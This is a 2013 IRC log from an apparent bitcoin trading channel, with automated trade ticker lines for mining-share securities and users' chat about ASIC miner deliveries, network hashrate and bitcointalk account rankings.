[BTCTC] [TAT.ASICMINER] 7 @ 0.028892 = 0.2022 BTC [+] Jun 19 01:50:55 im curious if in the end this magical bitcoin community will manage to make a usable splash screen Jun 19 01:50:58 pity i can't bitbet on io Jun 19 01:51:00 it* Jun 19 02:03:15 [HAVELOCK] [HIM] 1 @ 0.28811 BTC [-] Jun 19 02:03:30 [BTCTC] [ASICMINER-PT] 2 @ 2.8 = 5.6 BTC [-] Jun 19 02:04:16 [BTCTC] [TAT.ASICMINER] 13 @ 0.028893 = 0.3756 BTC [+] Jun 19 02:07:26 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006687 BTC [-] Jun 19 02:12:44 [BTCTC] [TAT.ASICMINER] 14 @ 0.028893 = 0.4045 BTC [+] Jun 19 02:15:07 heh a while ago someone was refuting my claim that 90% of bitcointalk accounts are fake Jun 19 02:15:33 https://bitcointalk.org/index.php?action=mlist Jun 19 02:21:18 [BTCTC] [DMS.SELLING] 5 @ 0.035 = 0.175 BTC [+] Jun 19 02:27:52 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [+] Jun 19 02:32:43 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.006504 = 0.3252 BTC [-] Jun 19 02:32:45 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.006503 = 0.0195 BTC [-] Jun 19 02:32:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006501 BTC [-] Jun 19 02:33:25 i'm considering subcontracting the splashy screen like i did the gpg story Jun 19 02:33:46 [BTCTC] [S.BBET-PT] 1 @ 0.00205 BTC [+] Jun 19 02:34:16 but that would work only if i can get artist to pay me commission from forter mg work Jun 19 02:34:21 *further Jun 19 02:34:34 [BTCTC] [GSDPT] 1 @ 0.002588 BTC [+] Jun 19 02:38:27 [BTCTC] [TAT.ASICMINER] 50 @ 0.028239 = 1.412 BTC [-] Jun 19 02:38:46 [BTCTC] [B.YABMC] 1 @ 0.013308 BTC [+] Jun 19 02:38:51 [BTCTC] [ASICMINER-PT] 1 @ 2.8718 BTC [+] Jun 19 02:39:51 dub, looks like roughly 50000 users out of 130000 are "Brand New" Jun 19 02:41:00 no wonder, everyone makes more accounts just in case there will be another ripple-like giveaway Jun 19 02:41:04 [BTCTC] [RSM] 1 @ 0.0162 BTC [+] Jun 19 02:42:55 [18:50] im curious if in the end this magical bitcoin community will manage to make a usable splash screen <<< I have ideas brewing, but I have no idea if I'll actually make the time before the deadline Jun 19 02:44:12 i can pretty guarantee whatever you get will not be outright "usable" Jun 19 02:44:29 much Jun 19 02:44:32 [BTCTC] [PAJKA.BOND] 1 @ 0.0746 BTC [+] Jun 19 02:45:24 ThickAsThieves youy think ? Jun 19 02:45:51 well even in my head, with full *intention* to make something decent Jun 19 02:46:15 I know it would require editing once jived with whatever concepts you are already juggling Jun 19 02:46:27 concept could be cool but name suck Jun 19 02:46:41 lettering could be perfect but scene not Jun 19 02:46:42 etc Jun 19 02:46:56 but i know that's okay Jun 19 02:47:08 all you really need is a spark Jun 19 02:47:27 i think you're too worried about this very us academic sort of "disqualified because red dot" Jun 19 02:47:32 i don't really work like that. Jun 19 02:47:43 that's actually what i meant to just say Jun 19 02:48:06 that i dont think you'd scrap something just because it wasnt perfect Jun 19 02:48:16 what's perfect to begin with. Jun 19 02:48:31 that's why i go to bed with multiple girls. perfection be nonsense. Jun 19 02:58:21 http://www.space.com/19195-night-sky-planets-asteroids-webcasts.html Jun 19 02:58:38 truffles: well, according to mp, those girls are his property Jun 19 02:59:11 [BTCTC] [TAT.ASICMINER] 50 @ 0.028892 = 1.4446 BTC [+] Jun 19 03:00:51 truffles: well, its legal anywhere Jun 19 03:01:02 you can be a sex slave consensually Jun 19 03:01:06 some women really get off on it Jun 19 03:02:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.028893 BTC [+] Jun 19 03:03:19 [MPEX] [S.MPOE] 3179 @ 0.00067603 = 2.1491 BTC [+] Jun 19 03:03:21 [MPEX] [S.MPOE] 25889 @ 0.00067737 = 17.5364 BTC [+] Jun 19 03:03:38 [MPEX] [S.MPOE] 1688 @ 0.00067868 = 1.1456 BTC [+] Jun 19 03:17:32 [BTCTC] [ASICMINER-PT] 3 @ 2.87 = 8.61 BTC [-] Jun 19 03:22:44 [HAVELOCK] [ASICM] 1 @ 0.0288879 BTC [-] Jun 19 03:31:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.028893 = 0.1156 BTC [+] Jun 19 03:32:57 https://bitcointalk.org/index.php?topic=237710.0 Jun 19 03:33:03 lol giga is in on the scam too? Jun 19 03:33:15 was just gonna link that Jun 19 03:33:25 ;;nethash Jun 19 03:33:25 143076.349798 Jun 19 03:36:28 [HAVELOCK] [SDICE] 4 @ 0.20021 = 0.8008 BTC [-] Jun 19 03:40:28 http://www.techpowerup.com/185854/new-asic-bitcoin-mining-products-producing-350-ghash-s-from-kncminer.html Jun 19 03:40:50 mainstream media getting attentive xD Jun 19 03:44:47 sooo this is the month bfl actually delivers then ? Jun 19 03:44:52 [HAVELOCK] [ASICM] 1 @ 0.0288879 BTC [-] Jun 19 03:46:06 [BTCTC] [RSM] 7 @ 0.016202 = 0.1134 BTC [+] Jun 19 03:46:09 [BTCTC] [RSM] 1 @ 0.016202 BTC [+] Jun 19 03:46:14 [BTCTC] [RSM] 450 @ 0.01693 = 7.6185 BTC [+] Jun 19 03:47:10 [BTCTC] [RSM] 500 @ 0.01706 = 8.53 BTC [+] Jun 19 03:47:12 [BTCTC] [RSM] 500 @ 0.01708 = 8.54 BTC [+] Jun 19 03:48:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.028893 = 0.0578 BTC [+] Jun 19 03:58:29 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [+] Jun 19 03:59:31 [BTCTC] [B.YABMC] 1 @ 0.01328 BTC [-] Jun 19 04:07:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.028893 = 0.2889 BTC [+] Jun 19 04:09:44 [HAVELOCK] [ASICM] 34 @ 0.0288879 = 0.9822 BTC [-] Jun 19 04:10:46 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Jun 19 04:15:26 [BTCTC] [TAT.ASICMINER] 9 @ 0.028893 = 0.26 BTC [+] Jun 19 04:33:30 [BTCTC] [TAT.ASICMINER] 18 @ 0.028892 = 0.5201 BTC [-] Jun 19 04:35:39 [BTCTC] [ASICMINER-PT] 4 @ 2.87 = 11.48 BTC [-] Jun 19 04:36:44 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Jun 19 04:39:10 [HAVELOCK] [ASICM] 1 @ 0.0286 BTC [-] Jun 19 04:39:10 [HAVELOCK] [ASICM] 100 @ 0.02851 = 2.851 BTC [-] Jun 19 04:39:12 [HAVELOCK] [ASICM] 74 @ 0.0285 = 2.109 BTC [-] Jun 19 04:42:56 I like how he has all that gear sitting on a $10 racking system Jun 19 04:50:32 [HAVELOCK] [ASICM] 23 @ 0.028888 = 0.6644 BTC [+] Jun 19 04:50:59 [HAVELOCK] [ASICM] 487 @ 0.0289 = 14.0743 BTC [+] Jun 19 04:51:05 [HAVELOCK] [ASICM] 5 @ 0.02929 = 0.1465 BTC [+] Jun 19 04:51:13 [HAVELOCK] [ASICM] 100 @ 0.0299 = 2.99 BTC [+] Jun 19 04:51:53 [BTCTC] [CRYPTO-TRADE] 25 @ 0.198949 = 4.9737 BTC [+] Jun 19 04:52:19 [BTCTC] [CRYPTO-TRADE] 9 @ 0.19895 = 1.7906 BTC [+] Jun 19 04:53:31 [BTCTC] [CRYPTO-TRADE] 10 @ 0.199997 = 2 BTC [+] Jun 19 04:53:56 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199998 BTC [+] Jun 19 04:54:07 mircea_popescu: seems like it, though it looks like they are all still 'special' customers Jun 19 04:54:16 myeah, Jun 19 04:54:22 still, a week or two left. Jun 19 04:55:07 at least the guy that received a single was approached to post about it Jun 19 04:55:38 giga is not a normal customer, luke is an empoyee etc Jun 19 04:56:05 I wouldn't say they are shipping the whole line yet Jun 19 05:01:12 [HAVELOCK] [VTX] 3 @ 0.48011 = 1.4403 BTC [-] Jun 19 05:02:55 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Jun 19 05:02:59 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Jun 19 05:06:03 [BTCTC] [ASICMINER-PT] 1 @ 2.8718 BTC [+] Jun 19 05:06:06 [BTCTC] [ASICMINER-PT] 7 @ 2.872 = 20.104 BTC [+] Jun 19 05:06:44 Diablo-D3: I found your blog http://whatshouldwecallpaleolife.tumblr.com/ **** BEGIN LOGGING AT Wed Jun 19 09:54:04 2013 Jun 19 10:01:27 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [-] Jun 19 10:02:11 [BTCTC] [DMS.PURCHASE] 64 @ 0.054589 = 3.4937 BTC [-] Jun 19 10:04:56 [BTCTC] [TAT.ASICMINER] 90 @ 0.0287 = 2.583 BTC [-] Jun 19 10:04:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.0286 = 0.3146 BTC [-] Jun 19 10:05:51 [BTCTC] [ASICMINER-PT] 1 @ 2.872 BTC [+] Jun 19 10:07:07 [HAVELOCK] [ASICM] 5 @ 0.0294 = 0.147 BTC [+] Jun 19 10:16:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0289 BTC [+] Jun 19 10:21:21 [MPEX] [S.MPOE] 6700 @ 0.00067885 = 4.5483 BTC [+] Jun 19 10:22:31 [BTCTC] [BTC-BOND] 6 @ 0.009997 = 0.06 BTC [+] Jun 19 10:31:11 [BTCTC] [DMS.PURCHASE] 55 @ 0.054589 = 3.0024 BTC [-] Jun 19 10:36:44 [HAVELOCK] [SDICE] 4 @ 0.2142101 = 0.8568 BTC [+] Jun 19 10:36:46 [HAVELOCK] [SDICE] 10 @ 0.2142102 = 2.1421 BTC [+] Jun 19 10:44:28 [HAVELOCK] [ASICM] 5 @ 0.0294 = 0.147 BTC [+] Jun 19 10:49:30 [BTCTC] [DMS.MINING] 3 @ 0.019999 = 0.06 BTC [-] Jun 19 10:49:32 [BTCTC] [DMS.MINING] 5 @ 0.0198 = 0.099 BTC [-] Jun 19 10:49:32 [BTCTC] [DMS.MINING] 1 @ 0.019751 BTC [-] Jun 19 10:49:34 [BTCTC] [DMS.MINING] 10 @ 0.01966 = 0.1966 BTC [-] Jun 19 10:49:36 [BTCTC] [DMS.MINING] 76 @ 0.01965 = 1.4934 BTC [-] Jun 19 10:49:49 [BTCTC] [S.DICE-PT] 7 @ 0.002714 = 0.019 BTC [-] Jun 19 10:51:31 [HAVELOCK] [ASICM] 4 @ 0.02961167 = 0.1184 BTC [+] Jun 19 10:54:05 [HAVELOCK] [ASICM] 1 @ 0.02961189 BTC [+] Jun 19 11:02:49 [BTCTC] [BITVPS] 15 @ 0.000785 = 0.0118 BTC [-] Jun 19 11:06:39 [MPEX] [S.MPOE] 50 @ 0.00067885 = 0.0339 BTC [+] Jun 19 11:06:40 [MPEX] [S.MPOE] 2250 @ 0.00067792 = 1.5253 BTC [-] Jun 19 11:10:28 [BTCTC] [COGNITIVE] 1 @ 0.285102 BTC [+] Jun 19 11:10:30 [BTCTC] [COGNITIVE] 6 @ 0.285101 = 1.7106 BTC [-] Jun 19 11:10:31 [BTCTC] [COGNITIVE] 1 @ 0.2851 BTC [-] Jun 19 11:10:39 [BTCTC] [COGNITIVE] 9 @ 0.28505 = 2.5655 BTC [-] Jun 19 11:10:43 [BTCTC] [COGNITIVE] 2 @ 0.284 = 0.568 BTC [-] Jun 19 11:10:46 [BTCTC] [COGNITIVE] 1 @ 0.283 BTC [-] Jun 19 11:10:50 [BTCTC] [COGNITIVE] 1 @ 0.28 BTC [-] Jun 19 11:11:03 [BTCTC] [COGNITIVE] 10 @ 0.28 = 2.8 BTC [-] Jun 19 11:11:07 [BTCTC] [COGNITIVE] 2 @ 0.2763 = 0.5526 BTC [-] Jun 19 11:11:09 [BTCTC] [COGNITIVE] 2 @ 0.2742 = 0.5484 BTC [-] Jun 19 11:11:11 [BTCTC] [COGNITIVE] 2 @ 0.2742 = 0.5484 BTC [-] Jun 19 11:11:12 [BTCTC] [COGNITIVE] 1 @ 0.2739 BTC [-] Jun 19 11:11:14 [BTCTC] [COGNITIVE] 3 @ 0.27003 = 0.8101 BTC [-] Jun 19 11:11:20 [BTCTC] [COGNITIVE] 1 @ 0.27 BTC [-] Jun 19 11:11:55 [BTCTC] [GSDPT] 2 @ 0.002586 = 0.0052 BTC [-] Jun 19 11:13:49 [BTCTC] [S.MPOE-PT] 15 @ 0.0007 = 0.0105 BTC [+] Jun 19 11:15:24 [BTCTC] [ASICMINER-PT] 4 @ 2.871 = 11.484 BTC [-] Jun 19 11:23:21 [BTCTC] [DMS.MINING] 1 @ 0.020349 BTC [+] Jun 19 11:23:23 [BTCTC] [DMS.MINING] 99 @ 0.02035 = 2.0147 BTC [+] Jun 19 11:24:26 [BTCTC] [S.DICE-PT] 3 @ 0.002714 = 0.0081 BTC [-] Jun 19 11:29:07 [BTCTC] [S.DICE-PT] 18 @ 0.0026 = 0.0468 BTC [-] Jun 19 11:29:13 [BTCTC] [GSDPT] 2 @ 0.002586 = 0.0052 BTC [-] Jun 19 11:30:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0289 BTC [+] **** BEGIN LOGGING AT Wed Jun 19 14:42:57 2013 Jun 19 14:43:00 [HAVELOCK] [ASICM] 56 @ 0.0289999 = 1.624 BTC [+] Jun 19 14:43:13 [BTCTC] [ASICMINER-PT] 2 @ 2.8389 = 5.6778 BTC [-] Jun 19 14:43:53 [HAVELOCK] [ASICM] 358 @ 0.029 = 10.382 BTC [+] Jun 19 14:46:25 [BTCTC] [TAT.ASICMINER] 6 @ 0.0291 = 0.1746 BTC [+] Jun 19 14:49:41 ;;bc,diff Jun 19 14:49:42 Error: "bc,diff" is not a valid command. Jun 19 14:50:02 ;;diff Jun 19 14:50:04 1.933925827238668E7 Jun 19 14:50:23 ;;bcstats Jun 19 14:50:24 Current Blocks: 242280 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1655 blocks | Next Difficulty In About: 2 weeks, 0 days, 6 hours, 24 minutes, and 49 seconds | Next Difficulty Estimate: 18795105.0541 | Estimated Percent Change: -2.81372 Jun 19 14:56:28 [BTCTC] [ASICMINER-PT] 5 @ 2.839 = 14.195 BTC [+] Jun 19 14:57:52 [BTCTC] [ASICMINER-PT] 2 @ 2.84799 = 5.696 BTC [+] Jun 19 14:57:54 [BTCTC] [ASICMINER-PT] 23 @ 2.848 = 65.504 BTC [+] Jun 19 14:57:56 [BTCTC] [ASICMINER-PT] 6 @ 2.849 = 17.094 BTC [+] Jun 19 14:58:34 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Jun 19 14:58:39 [HAVELOCK] [ASICM] 1 @ 0.0291 BTC [+] Jun 19 14:59:12 [BTCTC] [ASICMINER-PT] 6 @ 2.849 = 17.094 BTC [+] Jun 19 15:00:08 X.IDIFF.JUN has settled. contract holders received .19339258 per contract. Jun 19 15:09:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.029099 = 0.1164 BTC [-] Jun 19 15:10:10 [HAVELOCK] [ASICM] 24 @ 0.0291 = 0.6984 BTC [+] Jun 19 15:15:24 [BTCTC] [DMS.MINING] 230 @ 0.02034 = 4.6782 BTC [+] Jun 19 15:20:07 [BTCTC] [DMS.MINING] 50 @ 0.02035 = 1.0175 BTC [+] Jun 19 15:24:47 [BTCTC] [ASICMINER-PT] 1 @ 2.868 BTC [+] Jun 19 15:28:17 [HAVELOCK] [ASICM] 2 @ 0.0291 = 0.0582 BTC [+] Jun 19 15:29:45 [BTCTC] [TAT.ASICMINER] 66 @ 0.029 = 1.914 BTC [-] Jun 19 15:29:57 [HAVELOCK] [ASICM] 3 @ 0.0291 = 0.0873 BTC [+] Jun 19 15:30:35 X.IDIFF.JUN processed on coinbr, too. Jun 19 15:30:46 [BTCTC] [ASICMINER-PT] 2 @ 2.84 = 5.68 BTC [-] Jun 19 15:30:59 [BTCTC] [ASICMINER-PT] 5 @ 2.84 = 14.2 BTC [-] Jun 19 15:31:56 [BTCTC] [ASICMINER-PT] 5 @ 2.84 = 14.2 BTC [-] Jun 19 15:38:10 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [-] Jun 19 15:47:41 [HAVELOCK] [ASICM] 150 @ 0.0291 = 4.365 BTC [+] Jun 19 15:51:04 [BTCTC] [ASICMINER-PT] 2 @ 2.84 = 5.68 BTC [-] Jun 19 15:51:06 [HAVELOCK] [ASICM] 1 @ 0.0291 BTC [+] Jun 19 15:52:58 [BTCTC] [DMS.SELLING] 1 @ 0.035 BTC [-] Jun 19 15:54:49 http://science.slashdot.org/story/13/06/17/134237/canadian-couple-charged-5k-for-finding-400-year-old-skeleton Jun 19 15:56:00 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [-] Jun 19 15:57:18 [BTCTC] [TAT.VIRTUALMINE] 74 @ 0.0061 = 0.4514 BTC [-] Jun 19 15:57:21 [BTCTC] [TAT.VIRTUALMINE] 85 @ 0.00615 = 0.5228 BTC [+] Jun 19 16:02:35 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00615 = 0.0615 BTC [+] Jun 19 16:02:37 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.00618 = 0.0556 BTC [+] Jun 19 16:06:33 [BTCTC] [DMS.SELLING] 14 @ 0.035 = 0.49 BTC [-] Jun 19 16:08:10 [HAVELOCK] [ASICM] 56 @ 0.028561 = 1.5994 BTC [-] Jun 19 16:08:12 [HAVELOCK] [ASICM] 200 @ 0.02855 = 5.71 BTC [-] Jun 19 16:08:13 [HAVELOCK] [ASICM] 24 @ 0.02853002 = 0.6847 BTC [-] Jun 19 16:11:22 [BTCTC] [BITVPS] 10 @ 0.000835 = 0.0084 BTC [+] Jun 19 16:13:25 [BTCTC] [ASICMINER-PT] 2 @ 2.86 = 5.72 BTC [+] Jun 19 16:16:50 [BTCTC] [DMS.SELLING] 27 @ 0.035 = 0.945 BTC [-] Jun 19 16:16:52 [BTCTC] [DMS.SELLING] 30 @ 0.03525 = 1.0575 BTC [+] Jun 19 16:16:53 [BTCTC] [DMS.SELLING] 2 @ 0.0354 = 0.0708 BTC [+] Jun 19 16:18:51 [BTCTC] [TAT.ASICMINER] 96 @ 0.0286 = 2.7456 BTC [-] Jun 19 16:23:37 [MPEX] [S.MPOE] 1900 @ 0.00067897 = 1.29 BTC [+] Jun 19 16:23:39 [MPEX] [S.MPOE] 1950 @ 0.00067957 = 1.3252 BTC [+] Jun 19 16:25:53 [BTCTC] [ASICMINER-PT] 1 @ 2.820001 BTC [-] Jun 19 16:25:56 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [-] Jun 19 16:26:28 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [+] Jun 19 16:29:53 http://www.theverge.com/2013/6/19/4444266/john-mcafee-youtube-how-to-uninstall-mcafee-antivirus Jun 19 16:32:32 [HAVELOCK] [ASICM] 56 @ 0.02895 = 1.6212 BTC [+] Jun 19 16:33:28 ThickAsThieves: quite lulzy Jun 19 16:33:49 [BTCTC] [COGNITIVE] 1 @ 0.28 BTC [+] Jun 19 16:35:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.0286 = 0.286 BTC [-] Jun 19 16:35:45 stupid fucking laws Jun 19 16:35:51 they're dead. Jun 19 16:35:55 just leave'em be. Jun 19 16:36:25 [BTCTC] [ASICMINER-PT] 3 @ 2.85 = 8.55 BTC [+] Jun 19 16:37:27 [BTCTC] [GSDPT] 37 @ 0.002586 = 0.0957 BTC [-] Jun 19 16:38:12 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Jun 19 16:39:15 [MPEX] [S.MPOE] 14100 @ 0.00067814 = 9.5618 BTC [-] Jun 19 16:39:17 [MPEX] [S.MPOE] 6752 @ 0.00067777 = 4.5763 BTC [-] Jun 19 16:41:07 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199997 BTC [+] Jun 19 16:41:09 [BTCTC] [ASICMINER-PT] 7 @ 2.85 = 19.95 BTC [+] Jun 19 16:44:02 [HAVELOCK] [ASICM] 100 @ 0.02853002 = 2.853 BTC [-] Jun 19 16:44:34 [BTCTC] [S.DICE-PT] 49 @ 0.00272 = 0.1333 BTC [+] Jun 19 16:50:03 [HAVELOCK] [ASICM] 100 @ 0.0288 = 2.88 BTC [+] Jun 19 16:50:54 [HAVELOCK] [ASICM] 2 @ 0.0289 = 0.0578 BTC [+] Jun 19 16:50:56 [BTCTC] [TAT.ASICMINER] 6 @ 0.0286 = 0.1716 BTC [-] Jun 19 16:51:06 [HAVELOCK] [ASICM] 2 @ 0.0289 = 0.0578 BTC [+] Jun 19 16:56:11 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Jun 19 16:58:00 [BTCTC] [COGNITIVE] 1 @ 0.275 BTC [-] Jun 19 16:59:37 [BTCTC] [DMS.MINING] 21 @ 0.02036 = 0.4276 BTC [+] Jun 19 17:01:29 [BTCTC] [TAT.ASICMINER] 9 @ 0.0283 = 0.2547 BTC [-] Jun 19 17:02:45 ;;tslb Jun 19 17:02:48 Time since last block: 31 minutes and 35 seconds Jun 19 17:02:48 ;;nethash Jun 19 17:02:49 132897.18706 Jun 19 17:03:01 whats going on Jun 19 17:03:08 hi Jun 19 17:03:14 hi Jun 19 17:03:27 nehash is down 20k now Jun 19 17:03:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0286 = 0.0572 BTC [+] Jun 19 17:03:34 nethash* Jun 19 17:03:52 ;;bcstats Jun 19 17:03:53 Current Blocks: 242290 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1645 blocks | Next Difficulty In About: 2 weeks, 0 days, 4 hours, 20 minutes, and 41 seconds | Next Difficulty Estimate: 18715761.6654 | Estimated Percent Change: -3.22399 Jun 19 17:04:16 Is there some good news on BitVPS, their price started going up yesterday? Jun 19 17:04:17 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [-] Jun 19 17:17:35 ThickAsThieves: they had to unplug the Avalons and BFLs so they could box and ship... Jun 19 17:17:39 right? Jun 19 17:21:57 weird, my bitcointalk profile has reverted to 248 posts from 600+ yesterday. i'm back to senior member. wtf is that about? Jun 19 17:25:20 so now they have an ACTIVITY field... Jun 19 17:25:22 https://bitcointalk.org/index.php?topic=237597.0 Jun 19 17:25:22 deadweasel, https://bitcointalk.org/index.php?topic=237597.0 Jun 19 17:30:43 [BTCTC] [ASICMINER-PT] 1 @ 2.845 BTC [+] Jun 19 17:30:58 what is this calc? min(time*14, posts) Jun 19 17:31:28 it's defined in OP Jun 19 17:31:50 it's a way to value age over post count Jun 19 17:32:01 but still value activity Jun 19 17:32:45 [HAVELOCK] [ASICM] 1 @ 0.02853003 BTC [-] Jun 19 17:32:47 [HAVELOCK] [ASICM] 4 @ 0.02853003 = 0.1141 BTC [-] Jun 19 17:32:48 [HAVELOCK] [ASICM] 4 @ 0.02853002 = 0.1141 BTC [-] Jun 19 17:32:49 [HAVELOCK] [ASICM] 3 @ 0.02853002 = 0.0856 BTC [-] Jun 19 17:32:50 [HAVELOCK] [ASICM] 1 @ 0.02853 BTC [-] Jun 19 17:32:51 [HAVELOCK] [ASICM] 2 @ 0.02852 = 0.057 BTC [-] Jun 19 17:32:52 [HAVELOCK] [ASICM] 1 @ 0.0285 BTC [-] Jun 19 17:32:53 [HAVELOCK] [ASICM] 50 @ 0.0285 = 1.425 BTC [-] Jun 19 17:32:53 [HAVELOCK] [ASICM] 34 @ 0.0285 = 0.969 BTC [-] Jun 19 17:36:28 do you understand the actual calculatin min(time*14, posts)? I don't. help. Jun 19 17:36:35 calculation* Jun 19 17:38:24 1 "time" = a 2-week period where you were active Jun 19 17:39:07 this means you have zero ability tobe a Hero unless you've been active for 1 year Jun 19 17:39:38 [BTCTC] [ASICMINER-PT] 2 @ 2.845 = 5.69 BTC [+] Jun 19 17:41:57 i see. Jun 19 17:42:03 thx TAT Jun 19 17:42:55 np Jun 19 17:43:42 [BTCTC] [S.MPOE-PT] 3 @ 0.0007 = 0.0021 BTC [+] Jun 19 17:46:37 [MPEX] [S.MPOE] 9451 @ 0.00067777 = 6.4056 BTC [-] Jun 19 17:46:39 [MPEX] [S.MPOE] 1249 @ 0.00067762 = 0.8463 BTC [-] Jun 19 17:49:50 [MPEX] [S.MPOE] 2951 @ 0.00067762 = 1.9997 BTC [-] Jun 19 17:49:52 [MPEX] [S.MPOE] 1949 @ 0.00067747 = 1.3204 BTC [-] Jun 19 17:52:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.0286 = 0.0858 BTC [+] Jun 19 17:55:47 [BTCTC] [B.YABMC] 1 @ 0.01013 BTC [-] Jun 19 17:56:09 [BTCTC] [B.YABMC] 10 @ 0.0101 = 0.101 BTC [-] Jun 19 17:59:42 [BTCTC] [B.YABMC] 1 @ 0.01 BTC [-] Jun 19 18:03:03 [BTCTC] [ASICMINER-PT] 3 @ 2.844 = 8.532 BTC [-] Jun 19 18:03:13 [BTCTC] [ASICMINER-PT] 2 @ 2.845 = 5.69 BTC [+] Jun 19 18:03:18 [BTCTC] [ASICMINER-PT] 2 @ 2.84999 = 5.7 BTC [+] Jun 19 18:03:23 [BTCTC] [ASICMINER-PT] 3 @ 2.85 = 8.55 BTC [+] Jun 19 18:03:30 [BTCTC] [ASICMINER-PT] 21 @ 2.855 = 59.955 BTC [+] Jun 19 18:03:36 [BTCTC] [ASICMINER-PT] 1 @ 2.85695 BTC [+] Jun 19 18:03:40 [BTCTC] [ASICMINER-PT] 3 @ 2.857 = 8.571 BTC [+] Jun 19 18:04:06 [BTCTC] [ASICMINER-PT] 3 @ 2.8 = 8.4 BTC [-] Jun 19 18:06:49 [BTCTC] [ASICMINER-PT] 1 @ 2.831 BTC [+] Jun 19 18:06:59 [BTCTC] [ASICMINER-PT] 2 @ 2.83 = 5.66 BTC [-] Jun 19 18:07:06 [BTCTC] [ASICMINER-PT] 3 @ 2.82 = 8.46 BTC [-] Jun 19 18:07:18 [BTCTC] [ASICMINER-PT] 4 @ 2.812 = 11.248 BTC [-] Jun 19 18:07:39 [BITFUNDER] [TAT.VIRTUALMINE] [PAID] 124,735 @ 0.00002600 Jun 19 18:08:44 [BTCTC] [ASICMINER-PT] 1 @ 2.815 BTC [+] Jun 19 18:09:16 [BTCTC] [ASICMINER-PT] 1 @ 2.811001 BTC [-] Jun 19 18:09:39 [BTCTC] [ASICMINER-PT] 1 @ 2.8101 BTC [-] Jun 19 18:10:34 [BTCTC] [TAT.ASICMINER] 7 @ 0.0283 = 0.1981 BTC [-] Jun 19 18:10:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.028283 = 0.1131 BTC [-] Jun 19 18:10:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.028282 = 0.0566 BTC [-] Jun 19 18:10:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.028251 = 0.1413 BTC [-] Jun 19 18:10:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.02825 = 0.2825 BTC [-] Jun 19 18:10:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.028242 = 0.0847 BTC [-] Jun 19 18:10:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.02824 = 0.2824 BTC [-] Jun 19 18:11:00 [BTCTC] [TAT.ASICMINER] 21 @ 0.028238 = 0.593 BTC [-] Jun 19 18:11:10 [BTCTC] [TAT.ASICMINER] 6 @ 0.02822 = 0.1693 BTC [-] Jun 19 18:11:14 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005999 = 0.012 BTC [-] Jun 19 18:11:21 [HAVELOCK] [ASICM] 1 @ 0.0284 BTC [-] Jun 19 18:11:22 [HAVELOCK] [ASICM] 1 @ 0.02823 BTC [-] Jun 19 18:11:23 [HAVELOCK] [ASICM] 75 @ 0.02821 = 2.1158 BTC [-] Jun 19 18:11:24 [HAVELOCK] [ASICM] 35 @ 0.02821 = 0.9874 BTC [-] Jun 19 18:11:25 [HAVELOCK] [ASICM] 138 @ 0.0282 = 3.8916 BTC [-] Jun 19 18:11:47 If you're an LTC-GLOBAL voter, I would appreciate your vote on my new asset so trades can begin: https://btct.co/security/BFMINES Jun 19 18:12:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.0286 = 0.1144 BTC [+] Jun 19 18:13:10 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [+] Jun 19 18:13:39 [BTCTC] [TAT.ASICMINER] 50 @ 0.028251 = 1.4126 BTC [-] Jun 19 18:14:38 i almost bought voting shares a few weeks ago Jun 19 18:14:47 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005231 = 0.0105 BTC [-] Jun 19 18:14:55 but then the voting rights details were removed from the asset description Jun 19 18:15:02 and LTC value went up Jun 19 18:15:07 so I said nahhh Jun 19 18:19:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005999 BTC [+] Jun 19 18:21:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.028589 BTC [+] Jun 19 18:21:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.028589 BTC [+] Jun 19 18:25:02 [BTCTC] [DMS.MINING] 29 @ 0.019721 = 0.5719 BTC [-] Jun 19 18:25:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.02858 = 0.5716 BTC [-] Jun 19 18:29:42 [BTCTC] [ASICMINER-PT] 1 @ 2.8081 BTC [-] Jun 19 18:29:45 [BTCTC] [ASICMINER-PT] 1 @ 2.808 BTC [-] 